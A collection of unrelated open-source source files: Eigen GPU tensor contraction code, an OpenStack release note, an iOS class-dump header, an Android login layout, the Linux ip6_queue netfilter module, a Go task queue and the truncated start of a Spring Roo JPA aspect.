lhs, rhs, output, *((LHS_MEM *) lhs_shmem), *((RHS_MEM *) rhs_shmem), m_size, n_size, k_size, base_m, base_n);
} else {
EigenFloatContractionKernelInternal<Index, LhsMapper, RhsMapper, OutputMapper, true, true>(
lhs, rhs, output, *((LHS_MEM *) lhs_shmem), *((RHS_MEM *) rhs_shmem), m_size, n_size, k_size, base_m, base_n);
}
}
}
template<typename Index, typename LhsMapper,
typename RhsMapper, typename OutputMapper>
__global__ void
__launch_bounds__(256)
EigenFloatContractionKernel16x16(const LhsMapper lhs, const RhsMapper rhs,
const OutputMapper output,
const Index m_size, const Index n_size, const Index k_size) {
__shared__ float2 lhs_shmem[32][16];
__shared__ float2 rhs_shmem[64][8];
const Index m_block_idx = blockIdx.x;
const Index n_block_idx = blockIdx.y;
const Index base_m = 64 * m_block_idx;
const Index base_n = 64 * n_block_idx;
if (base_m + 63 < m_size) {
if (base_n + 63 < n_size) {
EigenFloatContractionKernelInternal16x16<Index, LhsMapper, RhsMapper, OutputMapper, false, false>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size, base_m, base_n);
} else {
EigenFloatContractionKernelInternal16x16<Index, LhsMapper, RhsMapper, OutputMapper, false, true>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size, base_m, base_n);
}
} else {
if (base_n + 63 < n_size) {
EigenFloatContractionKernelInternal16x16<Index, LhsMapper, RhsMapper, OutputMapper, true, false>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size, base_m, base_n);
} else {
EigenFloatContractionKernelInternal16x16<Index, LhsMapper, RhsMapper, OutputMapper, true, true>(lhs, rhs, output, lhs_shmem, rhs_shmem, m_size, n_size, k_size, base_m, base_n);
}
}
}
template<typename Indices, typename LeftArgType, typename RightArgType>
struct TensorEvaluator<const TensorContractionOp<Indices, LeftArgType, RightArgType>, GpuDevice> :
public TensorContractionEvaluatorBase<TensorEvaluator<const TensorContractionOp<Indices, LeftArgType, RightArgType>, GpuDevice> > {
typedef GpuDevice Device;
typedef TensorEvaluator<const TensorContractionOp<Indices, LeftArgType, RightArgType>, Device> Self;
typedef TensorContractionEvaluatorBase<Self> Base;
typedef TensorContractionOp<Indices, LeftArgType, RightArgType> XprType;
typedef typename internal::remove_const<typename XprType::Scalar>::type Scalar;
typedef typename XprType::Index Index;
typedef typename XprType::CoeffReturnType CoeffReturnType;
typedef typename PacketType<CoeffReturnType, GpuDevice>::type PacketReturnType;
enum {
Layout = TensorEvaluator<LeftArgType, Device>::Layout,
};
// Most of the code is assuming that both input tensors are ColMajor. If the
// inputs are RowMajor, we will "cheat" by swapping the LHS and RHS:
// If we want to compute A * B = C, where A is LHS and B is RHS, the code
// will pretend B is LHS and A is RHS.
typedef typename internal::conditional<
static_cast<int>(Layout) == static_cast<int>(ColMajor), LeftArgType, RightArgType>::type EvalLeftArgType;
typedef typename internal::conditional<
static_cast<int>(Layout) == static_cast<int>(ColMajor), RightArgType, LeftArgType>::type EvalRightArgType;
static const int LDims =
internal::array_size<typename TensorEvaluator<EvalLeftArgType, Device>::Dimensions>::value;
static const int RDims =
internal::array_size<typename TensorEvaluator<EvalRightArgType, Device>::Dimensions>::value;
static const int ContractDims = internal::array_size<Indices>::value;
typedef array<Index, LDims> left_dim_mapper_t;
typedef array<Index, RDims> right_dim_mapper_t;
typedef array<Index, ContractDims> contract_t;
typedef array<Index, LDims - ContractDims> left_nocontract_t;
typedef array<Index, RDims - ContractDims> right_nocontract_t;
static const int NumDims = LDims + RDims - 2 * ContractDims;
typedef DSizes<Index, NumDims> Dimensions;
// typedefs needed in evalTo
typedef typename internal::remove_const<typename EvalLeftArgType::Scalar>::type LhsScalar;
typedef typename internal::remove_const<typename EvalRightArgType::Scalar>::type RhsScalar;
typedef TensorEvaluator<EvalLeftArgType, Device> LeftEvaluator;
typedef TensorEvaluator<EvalRightArgType, Device> RightEvaluator;
typedef typename LeftEvaluator::Dimensions LeftDimensions;
typedef typename RightEvaluator::Dimensions RightDimensions;
EIGEN_DEVICE_FUNC TensorEvaluator(const XprType& op, const Device& device) :
Base(op, device) {}
// We need to redefine this method to make nvcc happy
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE bool evalSubExprsIfNeeded(Scalar* data) {
this->m_leftImpl.evalSubExprsIfNeeded(NULL);
this->m_rightImpl.evalSubExprsIfNeeded(NULL);
if (data) {
evalTo(data);
return false;
} else {
this->m_result = static_cast<Scalar *>(this->m_device.allocate(this->dimensions().TotalSize() * sizeof(Scalar)));
evalTo(this->m_result);
return true;
}
}
void evalTo(Scalar* buffer) const {
if (this->m_lhs_inner_dim_contiguous) {
if (this->m_rhs_inner_dim_contiguous) {
if (this->m_rhs_inner_dim_reordered) {
evalTyped<true, true, true, Unaligned>(buffer);
}
else {
evalTyped<true, true, false, Unaligned>(buffer);
}
}
else {
if (this->m_rhs_inner_dim_reordered) {
evalTyped<true, false, true, Unaligned>(buffer);
}
else {
evalTyped<true, false, false, Unaligned>(buffer);
}
}
}
else {
if (this->m_rhs_inner_dim_contiguous) {
if (this->m_rhs_inner_dim_reordered) {
evalTyped<false, true, true, Unaligned>(buffer);
}
else {
evalTyped<false, true, false, Unaligned>(buffer);
}
}
else {
if (this->m_rhs_inner_dim_reordered) {
evalTyped<false, false, true, Unaligned>(buffer);
}
else {
evalTyped<false, false, false, Unaligned>(buffer);
}
}
}
}
template <typename LhsScalar, typename RhsScalar, typename Index, typename LhsMapper, typename RhsMapper, typename OutputMapper> struct LaunchKernels {
static void Run(const LhsMapper& lhs, const RhsMapper& rhs, const OutputMapper& output, Index m, Index n, Index k, const GpuDevice& device) {
const Index m_blocks = (m + 63) / 64;
const Index n_blocks = (n + 63) / 64;
const dim3 num_blocks(m_blocks, n_blocks, 1);
const dim3 block_size(8, 8, 8);
LAUNCH_CUDA_KERNEL((EigenContractionKernel<Scalar, Index, LhsMapper, RhsMapper, OutputMapper>), num_blocks, block_size, 0, device, lhs, rhs, output, m, n, k);
}
};
template <typename Index, typename LhsMapper, typename RhsMapper, typename OutputMapper> struct LaunchKernels<float, float, Index, LhsMapper, RhsMapper, OutputMapper> {
static void Run(const LhsMapper& lhs, const RhsMapper& rhs, const OutputMapper& output, Index m, Index n, Index k, const GpuDevice& device) {
if (m < 768 || n < 768) {
const Index m_blocks = (m + 63) / 64;
const Index n_blocks = (n + 63) / 64;
const dim3 num_blocks(m_blocks, n_blocks, 1);
const dim3 block_size(16, 16, 1);
LAUNCH_CUDA_KERNEL((EigenFloatContractionKernel16x16<Index, LhsMapper, RhsMapper, OutputMapper>), num_blocks, block_size, 0, device, lhs, rhs, output, m, n, k);
} else {
const Index m_blocks = (m + 127) / 128;
const Index n_blocks = (n + 63) / 64;
const dim3 num_blocks(m_blocks, n_blocks, 1);
const dim3 block_size(8, 32, 1);
LAUNCH_CUDA_KERNEL((EigenFloatContractionKernel<Index, LhsMapper, RhsMapper, OutputMapper>), num_blocks, block_size, 0, device, lhs, rhs, output, m, n, k);
}
}
};
template <bool lhs_inner_dim_contiguous, bool rhs_inner_dim_contiguous, bool rhs_inner_dim_reordered, int Alignment>
void evalTyped(Scalar* buffer) const {
// columns in left side, rows in right side
const Index k = this->m_k_size;
EIGEN_UNUSED_VARIABLE(k)
// rows in left side
const Index m = this->m_i_size;
// columns in right side
const Index n = this->m_j_size;
// zero out the result buffer (which must be of size at least m * n * sizeof(Scalar)
this->m_device.memset(buffer, 0, m * n * sizeof(Scalar));
typedef internal::TensorContractionInputMapper<LhsScalar, Index, internal::Lhs,
LeftEvaluator, left_nocontract_t,
contract_t, 4,
lhs_inner_dim_contiguous,
false, Unaligned> LhsMapper;
typedef internal::TensorContractionInputMapper<RhsScalar, Index, internal::Rhs,
RightEvaluator, right_nocontract_t,
contract_t, 4,
rhs_inner_dim_contiguous,
rhs_inner_dim_reordered, Unaligned> RhsMapper;
typedef internal::blas_data_mapper<Scalar, Index, ColMajor> OutputMapper;
// initialize data mappers
LhsMapper lhs(this->m_leftImpl, this->m_left_nocontract_strides, this->m_i_strides,
this->m_left_contracting_strides, this->m_k_strides);
RhsMapper rhs(this->m_rightImpl, this->m_right_nocontract_strides, this->m_j_strides,
this->m_right_contracting_strides, this->m_k_strides);
OutputMapper output(buffer, m);
setCudaSharedMemConfig(cudaSharedMemBankSizeEightByte);
LaunchKernels<LhsScalar, RhsScalar, Index, LhsMapper, RhsMapper, OutputMapper>::Run(lhs, rhs, output, m, n, k, this->m_device);
}
};
} // end namespace Eigen
#endif // EIGEN_USE_GPU and __CUDACC__
#endif // EIGEN_CXX11_TENSOR_TENSOR_CONTRACTION_CUDA_H
| {
"pile_set_name": "Github"
} |
---
features:
- |
Add support for system-scope to ``role`` commands. This includes the ability to
generate system-scoped tokens using ``system_scope: all`` in ``cloud.yaml``
or ``OS_SYSTEM_SCOPE=all`` in an environment variable. Support is also
included for managing role assignments on the system using ``--system``
when adding and removing roles.
[`bp system-scope <https://blueprints.launchpad.net/keystone/+spec/system-scope>`_]
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Oct 15 2018 10:31:50).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.
//
#import <objc/NSObject.h>
#import <CoreTelephony/NSCopying-Protocol.h>
#import <CoreTelephony/NSSecureCoding-Protocol.h>
@class NSArray;
@interface CTMobileEquipmentInfoList : NSObject <NSCopying, NSSecureCoding>
{
NSArray *_meInfoList;
}
+ (BOOL)supportsSecureCoding;
- (void).cxx_destruct;
@property(retain, nonatomic) NSArray *meInfoList; // @synthesize meInfoList=_meInfoList;
- (id)initWithCoder:(id)arg1;
- (void)encodeWithCoder:(id)arg1;
- (id)copyWithZone:(struct _NSZone *)arg1;
- (id)description;
@end
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="fill_parent"
android:layout_height="fill_parent"
android:background="@color/kg_common_background"
android:focusableInTouchMode="true"
android:orientation="vertical" >
<include
layout="@layout/kg_common_title_bar" />
<ScrollView
android:id="@+id/kg_layout_scrollview"
android:layout_width="fill_parent"
android:layout_height="fill_parent"
android:layout_weight="1" >
<LinearLayout
android:id="@+id/kg_layout_userlogin"
android:layout_width="fill_parent"
android:layout_height="wrap_content"
android:layout_gravity="center"
android:background="@color/kg_common_background"
android:gravity="center"
android:orientation="vertical"
android:paddingBottom="20dp"
android:paddingTop="20dp" >
<LinearLayout
android:layout_width="300dp"
android:layout_height="wrap_content"
android:background="@drawable/kg_sp_bg"
android:gravity="center_vertical"
android:orientation="horizontal"
android:padding="5dp" >
<ImageView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_gravity="center_vertical"
android:padding="5dp"
android:scaleType="fitXY"
android:src="@drawable/kg_login_account_photo" />
<EditText
android:id="@+id/kg_login_username"
android:layout_width="0dp"
android:layout_height="35dp"
android:layout_weight="1"
android:background="@null"
android:hint="@string/kg_username"
android:maxLength="64"
android:paddingLeft="5dp"
android:singleLine="true"
android:textColor="@android:color/black"
android:textColorHint="@color/kg_common_hint_color"
android:textSize="16sp" >
</EditText>
<ImageView
android:id="@+id/kg_account_select"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:paddingRight="15dp"
android:src="@drawable/kg_account_select" />
</LinearLayout>
<LinearLayout
android:layout_width="300dp"
android:layout_height="wrap_content"
android:background="@drawable/kg_sp_bg"
android:gravity="center_vertical"
android:layout_marginTop="10dp"
android:orientation="horizontal"
android:padding="5dp" >
<ImageView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_gravity="center_vertical"
android:padding="5dp"
android:scaleType="fitXY"
android:src="@drawable/kg_login_password_photo" />
<EditText
android:id="@+id/kg_login_password"
android:layout_width="0dp"
android:layout_height="35dip"
android:layout_weight="1"
android:background="@null"
android:hint="@string/kg_password_text"
android:maxLength="64"
android:paddingLeft="5dp"
android:paddingRight="30dip"
android:password="true"
android:singleLine="true"
android:textColor="@android:color/black"
android:textColorHint="@color/kg_common_hint_color"
android:textSize="16sp" />
<TextView
android:id="@+id/kg_login_forgot_password"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:paddingRight="10dp"
android:text="@string/kg_forget_password"
android:textColor="@color/kg_common_gray_more_lighter"
android:textSize="16sp" />
</LinearLayout>
<TextView
android:id="@+id/kg_login_wrong_tips"
android:layout_width="300dp"
android:layout_height="wrap_content"
android:paddingBottom="5dp"
android:paddingTop="5dp"
android:textColor="@color/kg_common_red"
android:visibility="invisible" />
<LinearLayout
android:layout_width="300dp"
android:layout_height="wrap_content"
android:orientation="vertical" >
<Button
android:id="@+id/kg_start_login_button"
android:layout_width="300dip"
android:layout_height="@dimen/kg_btn_height"
android:background="@drawable/kg_selector_btn_blue"
android:shadowColor="#ff000fff"
android:text="@string/kg_login"
android:textColor="#ffffffff"
android:textSize="16sp" />
<Button
android:id="@+id/kg_start_reg_imdi_button"
android:layout_width="300dip"
android:layout_height="@dimen/kg_btn_height"
android:layout_marginTop="15dip"
android:background="@drawable/kg_selector_btn_green"
android:shadowColor="#ff000fff"
android:text="@string/kg_one_second_register"
android:textColor="#ffffffff"
android:textSize="16sp" />
</LinearLayout>
</LinearLayout>
</ScrollView>
<com.kugou.game.sdk.ui.widget.LoadingView
android:id="@+id/kg_loading"
android:layout_width="fill_parent"
android:layout_height="fill_parent"
android:layout_gravity="center"
android:layout_weight="1"
android:background="@color/kg_common_background"
android:gravity="center"
android:orientation="vertical"
android:visibility="gone" />
</LinearLayout> | {
"pile_set_name": "Github"
} |
/*
* This is a module which is used for queueing IPv6 packets and
* communicating with userspace via netlink.
*
* (C) 2001 Fernando Anton, this code is GPL.
* IPv64 Project - Work based in IPv64 draft by Arturo Azcorra.
* Universidad Carlos III de Madrid - Leganes (Madrid) - Spain
* Universidad Politecnica de Alcala de Henares - Alcala de H. (Madrid) - Spain
* email: [email protected]
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#include <linux/module.h>
#include <linux/skbuff.h>
#include <linux/init.h>
#include <linux/ipv6.h>
#include <linux/notifier.h>
#include <linux/netdevice.h>
#include <linux/netfilter.h>
#include <linux/netlink.h>
#include <linux/spinlock.h>
#include <linux/sysctl.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <net/net_namespace.h>
#include <net/sock.h>
#include <net/ipv6.h>
#include <net/ip6_route.h>
#include <net/netfilter/nf_queue.h>
#include <linux/netfilter_ipv4/ip_queue.h>
#include <linux/netfilter_ipv4/ip_tables.h>
#include <linux/netfilter_ipv6/ip6_tables.h>
#define IPQ_QMAX_DEFAULT 1024
#define IPQ_PROC_FS_NAME "ip6_queue"
#define NET_IPQ_QMAX_NAME "ip6_queue_maxlen"
typedef int (*ipq_cmpfn)(struct nf_queue_entry *, unsigned long);
static unsigned char copy_mode __read_mostly = IPQ_COPY_NONE;
static unsigned int queue_maxlen __read_mostly = IPQ_QMAX_DEFAULT;
static DEFINE_SPINLOCK(queue_lock);
static int peer_pid __read_mostly;
static unsigned int copy_range __read_mostly;
static unsigned int queue_total;
static unsigned int queue_dropped = 0;
static unsigned int queue_user_dropped = 0;
static struct sock *ipqnl __read_mostly;
static LIST_HEAD(queue_list);
static DEFINE_MUTEX(ipqnl_mutex);
static inline void
__ipq_enqueue_entry(struct nf_queue_entry *entry)
{
list_add_tail(&entry->list, &queue_list);
queue_total++;
}
static inline int
__ipq_set_mode(unsigned char mode, unsigned int range)
{
int status = 0;
switch(mode) {
case IPQ_COPY_NONE:
case IPQ_COPY_META:
copy_mode = mode;
copy_range = 0;
break;
case IPQ_COPY_PACKET:
if (range > 0xFFFF)
range = 0xFFFF;
copy_range = range;
copy_mode = mode;
break;
default:
status = -EINVAL;
}
return status;
}
static void __ipq_flush(ipq_cmpfn cmpfn, unsigned long data);
static inline void
__ipq_reset(void)
{
peer_pid = 0;
net_disable_timestamp();
__ipq_set_mode(IPQ_COPY_NONE, 0);
__ipq_flush(NULL, 0);
}
static struct nf_queue_entry *
ipq_find_dequeue_entry(unsigned long id)
{
struct nf_queue_entry *entry = NULL, *i;
spin_lock_bh(&queue_lock);
list_for_each_entry(i, &queue_list, list) {
if ((unsigned long)i == id) {
entry = i;
break;
}
}
if (entry) {
list_del(&entry->list);
queue_total--;
}
spin_unlock_bh(&queue_lock);
return entry;
}
static void
__ipq_flush(ipq_cmpfn cmpfn, unsigned long data)
{
struct nf_queue_entry *entry, *next;
list_for_each_entry_safe(entry, next, &queue_list, list) {
if (!cmpfn || cmpfn(entry, data)) {
list_del(&entry->list);
queue_total--;
nf_reinject(entry, NF_DROP);
}
}
}
static void
ipq_flush(ipq_cmpfn cmpfn, unsigned long data)
{
spin_lock_bh(&queue_lock);
__ipq_flush(cmpfn, data);
spin_unlock_bh(&queue_lock);
}
static struct sk_buff *
ipq_build_packet_message(struct nf_queue_entry *entry, int *errp)
{
sk_buff_data_t old_tail;
size_t size = 0;
size_t data_len = 0;
struct sk_buff *skb;
struct ipq_packet_msg *pmsg;
struct nlmsghdr *nlh;
struct timeval tv;
switch (ACCESS_ONCE(copy_mode)) {
case IPQ_COPY_META:
case IPQ_COPY_NONE:
size = NLMSG_SPACE(sizeof(*pmsg));
break;
case IPQ_COPY_PACKET:
if (entry->skb->ip_summed == CHECKSUM_PARTIAL &&
(*errp = skb_checksum_help(entry->skb)))
return NULL;
data_len = ACCESS_ONCE(copy_range);
if (data_len == 0 || data_len > entry->skb->len)
data_len = entry->skb->len;
size = NLMSG_SPACE(sizeof(*pmsg) + data_len);
break;
default:
*errp = -EINVAL;
return NULL;
}
skb = alloc_skb(size, GFP_ATOMIC);
if (!skb)
goto nlmsg_failure;
old_tail = skb->tail;
nlh = NLMSG_PUT(skb, 0, 0, IPQM_PACKET, size - sizeof(*nlh));
pmsg = NLMSG_DATA(nlh);
memset(pmsg, 0, sizeof(*pmsg));
pmsg->packet_id = (unsigned long )entry;
pmsg->data_len = data_len;
tv = ktime_to_timeval(entry->skb->tstamp);
pmsg->timestamp_sec = tv.tv_sec;
pmsg->timestamp_usec = tv.tv_usec;
pmsg->mark = entry->skb->mark;
pmsg->hook = entry->hook;
pmsg->hw_protocol = entry->skb->protocol;
if (entry->indev)
strcpy(pmsg->indev_name, entry->indev->name);
else
pmsg->indev_name[0] = '\0';
if (entry->outdev)
strcpy(pmsg->outdev_name, entry->outdev->name);
else
pmsg->outdev_name[0] = '\0';
if (entry->indev && entry->skb->dev &&
entry->skb->mac_header != entry->skb->network_header) {
pmsg->hw_type = entry->skb->dev->type;
pmsg->hw_addrlen = dev_parse_header(entry->skb, pmsg->hw_addr);
}
if (data_len)
if (skb_copy_bits(entry->skb, 0, pmsg->payload, data_len))
BUG();
nlh->nlmsg_len = skb->tail - old_tail;
return skb;
nlmsg_failure:
kfree_skb(skb);
*errp = -EINVAL;
printk(KERN_ERR "ip6_queue: error creating packet message\n");
return NULL;
}
static int
ipq_enqueue_packet(struct nf_queue_entry *entry, unsigned int queuenum)
{
int status = -EINVAL;
struct sk_buff *nskb;
if (copy_mode == IPQ_COPY_NONE)
return -EAGAIN;
nskb = ipq_build_packet_message(entry, &status);
if (nskb == NULL)
return status;
spin_lock_bh(&queue_lock);
if (!peer_pid)
goto err_out_free_nskb;
if (queue_total >= queue_maxlen) {
queue_dropped++;
status = -ENOSPC;
if (net_ratelimit())
printk (KERN_WARNING "ip6_queue: fill at %d entries, "
"dropping packet(s). Dropped: %d\n", queue_total,
queue_dropped);
goto err_out_free_nskb;
}
/* netlink_unicast will either free the nskb or attach it to a socket */
status = netlink_unicast(ipqnl, nskb, peer_pid, MSG_DONTWAIT);
if (status < 0) {
queue_user_dropped++;
goto err_out_unlock;
}
__ipq_enqueue_entry(entry);
spin_unlock_bh(&queue_lock);
return status;
err_out_free_nskb:
kfree_skb(nskb);
err_out_unlock:
spin_unlock_bh(&queue_lock);
return status;
}
static int
ipq_mangle_ipv6(ipq_verdict_msg_t *v, struct nf_queue_entry *e)
{
int diff;
struct ipv6hdr *user_iph = (struct ipv6hdr *)v->payload;
struct sk_buff *nskb;
if (v->data_len < sizeof(*user_iph))
return 0;
diff = v->data_len - e->skb->len;
if (diff < 0) {
if (pskb_trim(e->skb, v->data_len))
return -ENOMEM;
} else if (diff > 0) {
if (v->data_len > 0xFFFF)
return -EINVAL;
if (diff > skb_tailroom(e->skb)) {
nskb = skb_copy_expand(e->skb, skb_headroom(e->skb),
diff, GFP_ATOMIC);
if (!nskb) {
printk(KERN_WARNING "ip6_queue: OOM "
"in mangle, dropping packet\n");
return -ENOMEM;
}
kfree_skb(e->skb);
e->skb = nskb;
}
skb_put(e->skb, diff);
}
if (!skb_make_writable(e->skb, v->data_len))
return -ENOMEM;
skb_copy_to_linear_data(e->skb, v->payload, v->data_len);
e->skb->ip_summed = CHECKSUM_NONE;
return 0;
}
static int
ipq_set_verdict(struct ipq_verdict_msg *vmsg, unsigned int len)
{
struct nf_queue_entry *entry;
if (vmsg->value > NF_MAX_VERDICT || vmsg->value == NF_STOLEN)
return -EINVAL;
entry = ipq_find_dequeue_entry(vmsg->id);
if (entry == NULL)
return -ENOENT;
else {
int verdict = vmsg->value;
if (vmsg->data_len && vmsg->data_len == len)
if (ipq_mangle_ipv6(vmsg, entry) < 0)
verdict = NF_DROP;
nf_reinject(entry, verdict);
return 0;
}
}
static int
ipq_set_mode(unsigned char mode, unsigned int range)
{
int status;
spin_lock_bh(&queue_lock);
status = __ipq_set_mode(mode, range);
spin_unlock_bh(&queue_lock);
return status;
}
static int
ipq_receive_peer(struct ipq_peer_msg *pmsg,
unsigned char type, unsigned int len)
{
int status = 0;
if (len < sizeof(*pmsg))
return -EINVAL;
switch (type) {
case IPQM_MODE:
status = ipq_set_mode(pmsg->msg.mode.value,
pmsg->msg.mode.range);
break;
case IPQM_VERDICT:
status = ipq_set_verdict(&pmsg->msg.verdict,
len - sizeof(*pmsg));
break;
default:
status = -EINVAL;
}
return status;
}
static int
dev_cmp(struct nf_queue_entry *entry, unsigned long ifindex)
{
if (entry->indev)
if (entry->indev->ifindex == ifindex)
return 1;
if (entry->outdev)
if (entry->outdev->ifindex == ifindex)
return 1;
#ifdef CONFIG_BRIDGE_NETFILTER
if (entry->skb->nf_bridge) {
if (entry->skb->nf_bridge->physindev &&
entry->skb->nf_bridge->physindev->ifindex == ifindex)
return 1;
if (entry->skb->nf_bridge->physoutdev &&
entry->skb->nf_bridge->physoutdev->ifindex == ifindex)
return 1;
}
#endif
return 0;
}
static void
ipq_dev_drop(int ifindex)
{
ipq_flush(dev_cmp, ifindex);
}
#define RCV_SKB_FAIL(err) do { netlink_ack(skb, nlh, (err)); return; } while (0)
static inline void
__ipq_rcv_skb(struct sk_buff *skb)
{
int status, type, pid, flags;
unsigned int nlmsglen, skblen;
struct nlmsghdr *nlh;
bool enable_timestamp = false;
skblen = skb->len;
if (skblen < sizeof(*nlh))
return;
nlh = nlmsg_hdr(skb);
nlmsglen = nlh->nlmsg_len;
if (nlmsglen < sizeof(*nlh) || skblen < nlmsglen)
return;
pid = nlh->nlmsg_pid;
flags = nlh->nlmsg_flags;
if(pid <= 0 || !(flags & NLM_F_REQUEST) || flags & NLM_F_MULTI)
RCV_SKB_FAIL(-EINVAL);
if (flags & MSG_TRUNC)
RCV_SKB_FAIL(-ECOMM);
type = nlh->nlmsg_type;
if (type < NLMSG_NOOP || type >= IPQM_MAX)
RCV_SKB_FAIL(-EINVAL);
if (type <= IPQM_BASE)
return;
if (!capable(CAP_NET_ADMIN))
RCV_SKB_FAIL(-EPERM);
spin_lock_bh(&queue_lock);
if (peer_pid) {
if (peer_pid != pid) {
spin_unlock_bh(&queue_lock);
RCV_SKB_FAIL(-EBUSY);
}
} else {
enable_timestamp = true;
peer_pid = pid;
}
spin_unlock_bh(&queue_lock);
if (enable_timestamp)
net_enable_timestamp();
status = ipq_receive_peer(NLMSG_DATA(nlh), type,
nlmsglen - NLMSG_LENGTH(0));
if (status < 0)
RCV_SKB_FAIL(status);
if (flags & NLM_F_ACK)
netlink_ack(skb, nlh, 0);
}
static void
ipq_rcv_skb(struct sk_buff *skb)
{
mutex_lock(&ipqnl_mutex);
__ipq_rcv_skb(skb);
mutex_unlock(&ipqnl_mutex);
}
static int
ipq_rcv_dev_event(struct notifier_block *this,
unsigned long event, void *ptr)
{
struct net_device *dev = ptr;
if (!net_eq(dev_net(dev), &init_net))
return NOTIFY_DONE;
/* Drop any packets associated with the downed device */
if (event == NETDEV_DOWN)
ipq_dev_drop(dev->ifindex);
return NOTIFY_DONE;
}
static struct notifier_block ipq_dev_notifier = {
.notifier_call = ipq_rcv_dev_event,
};
static int
ipq_rcv_nl_event(struct notifier_block *this,
unsigned long event, void *ptr)
{
struct netlink_notify *n = ptr;
if (event == NETLINK_URELEASE && n->protocol == NETLINK_IP6_FW) {
spin_lock_bh(&queue_lock);
if ((net_eq(n->net, &init_net)) && (n->pid == peer_pid))
__ipq_reset();
spin_unlock_bh(&queue_lock);
}
return NOTIFY_DONE;
}
static struct notifier_block ipq_nl_notifier = {
.notifier_call = ipq_rcv_nl_event,
};
#ifdef CONFIG_SYSCTL
static struct ctl_table_header *ipq_sysctl_header;
static ctl_table ipq_table[] = {
{
.procname = NET_IPQ_QMAX_NAME,
.data = &queue_maxlen,
.maxlen = sizeof(queue_maxlen),
.mode = 0644,
.proc_handler = proc_dointvec
},
{ }
};
#endif
#ifdef CONFIG_PROC_FS
static int ip6_queue_show(struct seq_file *m, void *v)
{
spin_lock_bh(&queue_lock);
seq_printf(m,
"Peer PID : %d\n"
"Copy mode : %hu\n"
"Copy range : %u\n"
"Queue length : %u\n"
"Queue max. length : %u\n"
"Queue dropped : %u\n"
"Netfilter dropped : %u\n",
peer_pid,
copy_mode,
copy_range,
queue_total,
queue_maxlen,
queue_dropped,
queue_user_dropped);
spin_unlock_bh(&queue_lock);
return 0;
}
static int ip6_queue_open(struct inode *inode, struct file *file)
{
return single_open(file, ip6_queue_show, NULL);
}
static const struct file_operations ip6_queue_proc_fops = {
.open = ip6_queue_open,
.read = seq_read,
.llseek = seq_lseek,
.release = single_release,
.owner = THIS_MODULE,
};
#endif
static const struct nf_queue_handler nfqh = {
.name = "ip6_queue",
.outfn = &ipq_enqueue_packet,
};
static int __init ip6_queue_init(void)
{
int status = -ENOMEM;
struct proc_dir_entry *proc __maybe_unused;
netlink_register_notifier(&ipq_nl_notifier);
ipqnl = netlink_kernel_create(&init_net, NETLINK_IP6_FW, 0,
ipq_rcv_skb, NULL, THIS_MODULE);
if (ipqnl == NULL) {
printk(KERN_ERR "ip6_queue: failed to create netlink socket\n");
goto cleanup_netlink_notifier;
}
#ifdef CONFIG_PROC_FS
proc = proc_create(IPQ_PROC_FS_NAME, 0, init_net.proc_net,
&ip6_queue_proc_fops);
if (!proc) {
printk(KERN_ERR "ip6_queue: failed to create proc entry\n");
goto cleanup_ipqnl;
}
#endif
register_netdevice_notifier(&ipq_dev_notifier);
#ifdef CONFIG_SYSCTL
ipq_sysctl_header = register_sysctl_paths(net_ipv6_ctl_path, ipq_table);
#endif
status = nf_register_queue_handler(NFPROTO_IPV6, &nfqh);
if (status < 0) {
printk(KERN_ERR "ip6_queue: failed to register queue handler\n");
goto cleanup_sysctl;
}
return status;
cleanup_sysctl:
#ifdef CONFIG_SYSCTL
unregister_sysctl_table(ipq_sysctl_header);
#endif
unregister_netdevice_notifier(&ipq_dev_notifier);
proc_net_remove(&init_net, IPQ_PROC_FS_NAME);
cleanup_ipqnl: __maybe_unused
netlink_kernel_release(ipqnl);
mutex_lock(&ipqnl_mutex);
mutex_unlock(&ipqnl_mutex);
cleanup_netlink_notifier:
netlink_unregister_notifier(&ipq_nl_notifier);
return status;
}
static void __exit ip6_queue_fini(void)
{
nf_unregister_queue_handlers(&nfqh);
ipq_flush(NULL, 0);
#ifdef CONFIG_SYSCTL
unregister_sysctl_table(ipq_sysctl_header);
#endif
unregister_netdevice_notifier(&ipq_dev_notifier);
proc_net_remove(&init_net, IPQ_PROC_FS_NAME);
netlink_kernel_release(ipqnl);
mutex_lock(&ipqnl_mutex);
mutex_unlock(&ipqnl_mutex);
netlink_unregister_notifier(&ipq_nl_notifier);
}
MODULE_DESCRIPTION("IPv6 packet queue handler");
MODULE_LICENSE("GPL");
MODULE_ALIAS_NET_PF_PROTO(PF_NETLINK, NETLINK_IP6_FW);
module_init(ip6_queue_init);
module_exit(ip6_queue_fini);
| {
"pile_set_name": "Github"
} |
package libcontainerd
import "sync"
type queue struct {
sync.Mutex
fns map[string]chan struct{}
}
func (q *queue) append(id string, f func()) {
q.Lock()
defer q.Unlock()
if q.fns == nil {
q.fns = make(map[string]chan struct{})
}
done := make(chan struct{})
fn, ok := q.fns[id]
q.fns[id] = done
go func() {
if ok {
<-fn
}
f()
close(done)
q.Lock()
if q.fns[id] == done {
delete(q.fns, id)
}
q.Unlock()
}()
}
| {
"pile_set_name": "Github"
} |
// WARNING: DO NOT EDIT THIS FILE. THIS FILE IS MANAGED BY SPRING ROO.
// You may push code into the target .java compilation unit if you wish to edit any member(s).
package nl.bzk.brp.model.data.kern;
import java.util.List;
import javax.persistence.EntityManager;
import javax.persistence.PersistenceContext;
import nl.bzk.brp.model.data.kern.HisDoc;
import org.springframework.transaction.annotation.Transactional;
privileged aspect HisDoc_Roo_Jpa_ActiveRecord {
@PersistenceContext
transient EntityManager HisDoc.entityManager;
public static final EntityManager HisDoc.entityManager() {
EntityManager em = new HisDoc().entityManager;
